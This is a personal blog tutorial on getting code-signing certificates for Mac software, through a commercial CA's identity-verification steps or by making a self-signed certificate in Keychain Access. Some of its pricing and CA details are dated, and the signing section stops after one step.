Wilson Mar bio photo

Wilson Mar

Hello. Hire me!

Email me Calendar Skype call 310 320-7878

LinkedIn Twitter Gitter Instagram Youtube

Github Stackoverflow Pinterest

Keep safe, my friend

US (English)   Español (Spanish)   Français (French)   Deutsch (German)   Italiano   Português   Cyrillic Russian   中文 (简体) Chinese (Simplified)   日本語 Japanese   한국어 Korean


This article describes the use of code-signing certificates on Macs.

For production use by the public, generate a code signing key on the website of a CA (trusted CA (Certificate Authority)) recognized in the operating system and application that uses your script/build.

You ship your script/program with the code-signing certificate generated for it.

The certificate is then imported onto the computer of those who which to use your script/program.

If your users need to reference a CA not already known to their internet browser, they also need to install a certificate to trust the CA in addition to the certificate the CA generated for you. This is the case for “self-signed” certificates and in organizations which have employees using a corporatew-owned CA.

Certificates generated for use on Macs may have a different format than those on Windows. But converters can be used.

Certificates are issued for a period of time, after which need to be renewed.

Generate a signing key on CA website

  1. Select a CA and its reseller.

    Public Trusted CAs

    This reseller offers $69.17/year for a certificate from Comodo, which sells certs direct via InstantSSL at $179/year.

    Alternately, Tucows offers certs at $75/year. VeriSign and GoDaddy (StarField) are two of the largest commercial root CAs. They charge $250 per year or more for certificates because they are the organizations behind Trusted root certificates in Apple’s OS X Trust Store and Microsoft.

    A code-signing certificate is different than “SSL/TLS” certificates used by web browsers.

    PROTIP: Even though a CA is not recognized by browsers, it doesn’t matter for code signing certificates created for PowerShell scripts, ActiveX controls, Java applets, dynamic link libraries, .cab files and .jar files.

    CAcert.org offers certificates, but are not recognized. So they are equivalent to self-signed certs.

    However, using them is less work than creating self-signed CAs and certs, described below.

    A CA in Poland, certum.pl, used to offer free certificates.

    CA StartSSL.com operates in Israel.

    Certificates cost money because issuers confirm the validity of organizations they sign. This includes verifying physical existence and business presence.

  2. Get a physical address for use on your domain, phone, utility, tax bill, bank, and drivers license.

  3. Get a telephone bill under that address.

    If you don’t want to use your cell phone, a http://www.magicjack.com/ account (at $40/year) will do.

  4. Get a domain name with email setup under the same address on your driver’s license and utility bill.

    Comodo does not allow use of free email accounts such as Gmail, Hotmail, etc.

  5. Use Google Chrome to register for a Comodo account using that email address.

    Comodo receives e-mail only from those with a support account.

  6. Confirm the email, then return to the website for Password Login.

  7. Get a bank checking account and printed check with the common physical address.

    You may have to wait to receive your printed checks.

  8. Scan into PDF files each proof of your identity.

    You will be asked for a copy of identity papers shortly after you apply, so don’t pay for a cert until you have all the files you will need to present.

    A property tax bill if you own your home.

    A copy of the applicant’s Articles of Incorporation. Information in the Articles should be verified by checking the relevant government corporation database wherever possible. If it is not possible to at least verify the existence of a registered entity of that name in the relevant jurisdiction, then the Articles must be supplemented with additional documentation. Acceptable additional documentation: Business License DUNS details (e.g. Dun & Bradstreet company number).

  9. Get a electric or phone utility bill under the address to be associated with the certificate.

  10. Download and print Tucow’s face-to-face verification form.

  11. Find and go to a Notary to confirm your ID and sign that verification form.

    Most banks have a notary and will notarize free for their customers.

  12. Pay for the certificate on the website.

    Some CAs require you first create a CSR (Certificate Signing Request) file.

  13. Upload PDF files to verify your identity.

  14. Wait for a phone call from the CA.

  15. Wait for the email with instructions to download the cert from their website.

    You must use the same computer and web browser used to request the certificate.

  16. Export the key from the browser

  17. Backup the key immediately to alternate media such as CD or DVD disk.

    PROTIP: USB plugs degrade over time quicker than CD or DVD disks.

  18. Put the media in a fire-safe locked box.

  19. Timestamp your signatures so the CA can “co-sign” your code such that even when your certificate has expired, Comodo continues to testify to your program’s legitimacy.

    See http://wiki.cacert.org/TimeStamping

If the above is too much of a hassle for you, self-sign your app.

Create CA root cert on Mac

Create self-signed cert on Mac

Based on https://support.apple.com/kb/PH20131?locale=en_US&viewlocale=en_US

  1. Click Apple’s search icon at the upper-right corner.

  2. Type “Keychain Access” for that GUI.

  3. Click “Keychain Access” and choose Certificate Assistant, then Create a Certificate.

  4. Enter a name for the certificate in the “Create Your Certificate” GUI.

    PROTIP: Include in the Name items separated by dashed: your email, machine name assigned by security, user name, such as “wilsonmar@gmail.com-M345-mac”.

  5. Highlight the name and copy it to your Clipboard.

  6. For Identity Type, leave it “Self Signed Root”.

  7. For Certificate Type, select “Code Signing”.

  8. Click Create and Continue for the pop-up.

    NOTE: 2048 bits is the default (the minimum now). The program can generate up to 4096 bits.

    See https://developer.apple.com/library/content/technotes/tn2326/_index.html

  9. Click Create a certificate that’s good for one year.

  10. Click Done.

    Export for running elsewhere

  11. Return to the “Keychain Access” GUI.

  12. Click to select the certificate you just created.

  13. Select menu File, Export Items.

  14. Paste in Save As field the certificate name (“wilsonmar@gmail.com-M345-mac”).

  15. Instead of “.p12” select “Certificate (.cer)”.

  16. Click Save.

  17. Quit Keychain Access.

    Sign a file on Mac

  18. Go to where you saved the cert created following the steps above.


  • https://www.sans.org/security-resources/glossary-of-terms/

  • Doug

  • http://www.wilsonmar.com/1certs.htm

More on DevOps

This is one of a series on DevOps:

  1. DevOps_2.0
  2. ci-cd (Continuous Integration and Continuous Delivery)
  3. User Stories for DevOps

  4. Git and GitHub vs File Archival
  5. Git Commands and Statuses
  6. Git Commit, Tag, Push
  7. Git Utilities
  8. Data Security GitHub
  9. GitHub API
  10. TFS vs. GitHub

  11. Choices for DevOps Technologies
  12. Java DevOps Workflow
  13. AWS DevOps (CodeCommit, CodePipeline, CodeDeploy)
  14. AWS server deployment options

  15. Cloud services comparisons (across vendors)
  16. Cloud regions (across vendors)
  17. AWS Virtual Private Cloud

  18. Azure Cloud Onramp
  19. Azure Cloud
  20. Azure Cloud Powershell
  21. Bash Windows using Microsoft’s WSL (Windows Subystem for Linux)

  22. Digital Ocean
  23. Cloud Foundry

  24. Packer automation to build Vagrant images
  25. Terraform multi-cloud provisioning automation
  26. Hashicorp Vault and Consul to generate and hold secrets

  27. Powershell Ecosystem
  28. Powershell on MacOS
  29. Powershell Desired System Configuration

  30. Jenkins Server Setup
  31. Jenkins Plug-ins
  32. Jenkins Freestyle jobs
  33. Jenkins2 Pipeline jobs using Groovy code in Jenkinsfile

  34. Docker (Glossary, Ecosystem, Certification)
  35. Make Makefile for Docker
  36. Docker Setup and run Bash shell script
  37. Bash coding
  38. Docker Setup
  39. Dockerize apps
  40. Docker Registry

  41. Maven on MacOSX

  42. Ansible

  43. MySQL Setup

  44. SonarQube static code scan

  45. API Management Microsoft
  46. API Management Amazon

  47. Scenarios for load